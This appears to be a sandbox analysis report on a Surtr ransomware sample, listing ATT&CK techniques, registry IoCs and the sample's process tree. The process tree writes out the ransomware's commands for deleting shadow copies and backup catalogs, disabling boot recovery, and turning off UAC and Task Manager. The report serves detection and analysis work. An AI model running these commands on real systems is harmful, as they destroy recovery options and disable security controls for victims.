File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\WHOOSH.WAV.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4720	schtasks.exe
3984	schtasks.exe
2892	schtasks.exe

Interacts with shadow copies 2 TTPs 52 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4976	vssadmin.exe
4872	vssadmin.exe
1260	vssadmin.exe
2196	vssadmin.exe
4364	vssadmin.exe
644	vssadmin.exe
2500	vssadmin.exe
3732	vssadmin.exe
2984	vssadmin.exe
4876	vssadmin.exe
4964	vssadmin.exe
1504	vssadmin.exe
4280	vssadmin.exe
2192	vssadmin.exe
3492	vssadmin.exe
744	vssadmin.exe
4760	vssadmin.exe
3092	vssadmin.exe
3376	vssadmin.exe
1828	vssadmin.exe
2340	vssadmin.exe
824	vssadmin.exe
208	vssadmin.exe
4836	vssadmin.exe
2756	vssadmin.exe
4276	vssadmin.exe
3228	vssadmin.exe
2892	vssadmin.exe
4844	vssadmin.exe
4296	vssadmin.exe
2852	vssadmin.exe
4748	vssadmin.exe
2296	vssadmin.exe
4160	vssadmin.exe
2892	vssadmin.exe
1240	vssadmin.exe
5036	vssadmin.exe
1616	vssadmin.exe
3224	vssadmin.exe
1136	vssadmin.exe
1140	vssadmin.exe
5064	vssadmin.exe
3196	vssadmin.exe
4052	vssadmin.exe
416	vssadmin.exe
4184	vssadmin.exe
4752	vssadmin.exe
3556	vssadmin.exe
3424	vssadmin.exe
4292	vssadmin.exe
3968	vssadmin.exe
4936	vssadmin.exe

Modifies registry class 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surtr	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surtr\ = "surtr_auto_file"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeBackupPrivilege	1908	vssvc.exe
Token: SeRestorePrivilege	1908	vssvc.exe
Token: SeAuditPrivilege	1908	vssvc.exe
Token: SeBackupPrivilege	3872	wbengine.exe
Token: SeRestorePrivilege	3872	wbengine.exe
Token: SeSecurityPrivilege	3872	wbengine.exe
Token: SeSecurityPrivilege	4720	wevtutil.exe
Token: SeBackupPrivilege	4720	wevtutil.exe
Token: SeSecurityPrivilege	1132	wevtutil.exe
Token: SeBackupPrivilege	1132	wevtutil.exe
Token: SeSecurityPrivilege	3984	wevtutil.exe
Token: SeBackupPrivilege	3984	wevtutil.exe
Token: SeSecurityPrivilege	4600	wevtutil.exe
Token: SeBackupPrivilege	4600	wevtutil.exe
Token: SeSecurityPrivilege	1508	wevtutil.exe
Token: SeBackupPrivilege	1508	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5004 wrote to memory of 3892	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	67
PID 5004 wrote to memory of 3892	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	67
PID 5004 wrote to memory of 3892	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	67
PID 5004 wrote to memory of 4560	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	68
PID 5004 wrote to memory of 4560	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	68
PID 5004 wrote to memory of 4560	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	68
PID 5004 wrote to memory of 4660	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	70
PID 5004 wrote to memory of 4660	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	70
PID 5004 wrote to memory of 1376	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	69
PID 5004 wrote to memory of 1376	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	69
PID 5004 wrote to memory of 4260	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	72
PID 5004 wrote to memory of 4260	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	72
PID 5004 wrote to memory of 2880	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	74
PID 5004 wrote to memory of 2880	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	74
PID 5004 wrote to memory of 4336	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	75
PID 5004 wrote to memory of 4336	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	75
PID 5004 wrote to memory of 1260	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	76
PID 5004 wrote to memory of 1260	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	76
PID 5004 wrote to memory of 4284	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	80
PID 5004 wrote to memory of 4284	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	80
PID 5004 wrote to memory of 1616	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	79
PID 5004 wrote to memory of 1616	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	79
PID 5004 wrote to memory of 4692	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	83
PID 5004 wrote to memory of 4692	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	83
PID 5004 wrote to memory of 3988	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	86
PID 5004 wrote to memory of 3988	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	86
PID 5004 wrote to memory of 3412	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	88
PID 5004 wrote to memory of 3412	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	88
PID 5004 wrote to memory of 3628	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	89
PID 5004 wrote to memory of 3628	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	89
PID 4660 wrote to memory of 4748	4660	cmd.exe	93
PID 4660 wrote to memory of 4748	4660	cmd.exe	93
PID 1376 wrote to memory of 4184	1376	cmd.exe	99
PID 1376 wrote to memory of 4184	1376	cmd.exe	99
PID 2880 wrote to memory of 3588	2880	cmd.exe	94
PID 2880 wrote to memory of 3588	2880	cmd.exe	94
PID 4260 wrote to memory of 3732	4260	cmd.exe	98
PID 4260 wrote to memory of 3732	4260	cmd.exe	98
PID 4336 wrote to memory of 4060	4336	cmd.exe	97
PID 4336 wrote to memory of 4060	4336	cmd.exe	97
PID 5004 wrote to memory of 3968	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	96
PID 5004 wrote to memory of 3968	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	96
PID 5004 wrote to memory of 2156	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	95
PID 5004 wrote to memory of 2156	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	95
PID 5004 wrote to memory of 4924	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	102
PID 5004 wrote to memory of 4924	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	102
PID 5004 wrote to memory of 4920	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	103
PID 5004 wrote to memory of 4920	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	103
PID 3988 wrote to memory of 2984	3988	cmd.exe	104
PID 3988 wrote to memory of 2984	3988	cmd.exe	104
PID 1616 wrote to memory of 4976	1616	cmd.exe	105
PID 1616 wrote to memory of 4976	1616	cmd.exe	105
PID 1260 wrote to memory of 4836	1260	cmd.exe	107
PID 1260 wrote to memory of 4836	1260	cmd.exe	107
PID 4284 wrote to memory of 4724	4284	cmd.exe	108
PID 4284 wrote to memory of 4724	4284	cmd.exe	108
PID 3412 wrote to memory of 4828	3412	cmd.exe	106
PID 3412 wrote to memory of 4828	3412	cmd.exe	106
PID 3628 wrote to memory of 4760	3628	cmd.exe	109
PID 3628 wrote to memory of 4760	3628	cmd.exe	109
PID 4692 wrote to memory of 4712	4692	cmd.exe	111
PID 4692 wrote to memory of 4712	4692	cmd.exe	111
PID 5004 wrote to memory of 1288	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	114
PID 5004 wrote to memory of 1288	5004	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	114

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1828	attrib.exe
2752	attrib.exe
4736	attrib.exe
1996	attrib.exe
1388	attrib.exe
5020	attrib.exe
4984	attrib.exe
3196	attrib.exe

C:\Users\Admin\AppData\Local\Temp\b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
"C:\Users\Admin\AppData\Local\Temp\b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe"
1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:5004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:3892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:4560
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1376
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4184
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4660
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4748
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4260
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4836
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4284
- - C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    3⤵
    - Deletes NTFS Change Journal
    PID:4724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4692
- - C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:4712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3412
- - C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    3⤵
    PID:4828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3628
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:2156
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
  2⤵
  PID:3968
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
  2⤵
  PID:4924
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2296
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:4920
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:1192
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
  2⤵
  PID:1288
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2192
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:1728
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:4168
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
  2⤵
  PID:64
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
  2⤵
  PID:2412
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:3952
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:2880
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
  2⤵
  PID:4700
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:4816
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:5076
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:5116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
  2⤵
  PID:5068
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4964
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:4100
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:652
- C:\Windows\System32\cmd.exe
